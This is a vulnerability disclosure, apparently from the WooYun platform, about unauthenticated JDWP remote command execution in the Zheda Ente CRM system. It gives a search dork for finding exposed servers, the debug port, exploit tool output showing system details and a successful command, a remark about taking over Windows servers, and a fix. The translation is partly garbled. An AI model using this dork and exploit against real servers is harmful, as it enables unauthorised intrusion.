浙大恩特某资源管理系统通用JDWP命令执行(无需登录)

漏洞标题 浙大恩特某资源管理系统通用JDWP命令执行(无需登录) 相关厂商 杭州浙大恩特网络科技有限公司 漏洞作者 Aasron 提交时间 2016-04-27 20:30 公开时间 2016-06-…

漏洞标题 一般JDWP命令执行浙江大学资源管理系统(无需登录) 相关制造商 杭州浙大恩特网络科技有限公司 漏洞作者 Aasron 提交时间 2016-04-27 20: 30 公共时间 2016-06-13 10: 20 漏洞类型 命令执行 危险等级 高 自我评估等级 20 漏洞状态 已提交给第三方合作机构(cncert National Internet Emergency Center) 标签标签 Webshell,补丁不及时,远程命令执行,第三方框架,远程代码执行 漏洞详细信息 附上大量案件 要在百度中构建关键字: Intitle:欢迎来到Zheda Ente客户资源管理系统

根据每个服务器的情况打开端口。

**。**。**。**: 81 / http://**。**。**。** / http://**。**。**。** / ** ** ** ** / **。**。**。** **。**。**。** **。**。**。** **。**。**。** 漏洞证明:

[+]定位'**。**。**。**: 8787' [+]读取'Java HotSpot(TM)Server VM - 1.7.0_40'的设置 [+]找到运行时类: id=2405 [+] Found Runtime.getRuntime(): id=3dc1b124 [+]创建的中断事件id=2 Failure when receiving data from the peer [+]找到用户当前的工作目录'D: \ EnterCRM \ bin' [+]找到Java安装目录'D: \ EnterCRM \ jdk1.7.0_40 \ jre' [+]找到用户的帐户名称'QZ-DUNTUO $' [+]发现Java虚拟机实施供应商'Oracle Corporation' [+]发现Java Runtime Environment供应商'Oracle Corporation' [+]找到路径分隔符';' [+]找到Java供应商网址'http://**。**。**。** /' [+]找到Java类路径'D: \ EnterCRM \ bin \ run.jar' [+]发现Java Runtime Environment规范版本'1.7' [+]找到操作系统版本'6.1' [+]找到操作系统架构'x86' [+]发现Java Runtime Environment版本'1.7.0_40' [+]发现Java虚拟机实现版本'24 .0-b56' [+]找到Java虚拟机规范名称'Java Virtual Machine Specific 通货膨胀” [+]找到文件分隔符'\' [ - ] **。**。**。** piler:意外返回类型:期待字符串 [+]发现Java类格式版本号'51 .0' [+]找到加载库时的搜索路径列表'D: \ EnterCRM \ jdk1.7.0_4 0 \ bin; C: \ Windows \ Sun \ Java \ bin; C: \ Windows \ system32; C: \ Windows; D: \ EnterCRM \ jdk1.7。 0_40 \ bin; C: \ Windows \ system32; C: \ Windows; C: \ Windows \ System32 \ Wbem; C: \ Windows \ Syst Em32 \ WindowsPowerShell \ v1.0 \; C: \ Program Files(x86)\ Sybase \ SQL Anywhere 9 \ win32; C: \ Program Files(x86)\ Sybase \ Shared \ win32; C: \ Program Files(x86)\ Sybase \ SQL Any 其中9 \驱动程序; C: \ Program Files(x86)\ Sybase \ Shared \ Sybase Central 4.3 \ win32 ; “ [+]找到Java虚拟机实现名称'Java HotSpot(TM)Server VM' [+]找到用户的主目录'C: \' [!]命令已成功执行 如果是windows系统,则启用默认端口3389,可以直接执行该命令,可以直接获取服务器权限。 修理计划: 关闭调试模式 版权声明:请注明出处Aasron @乌云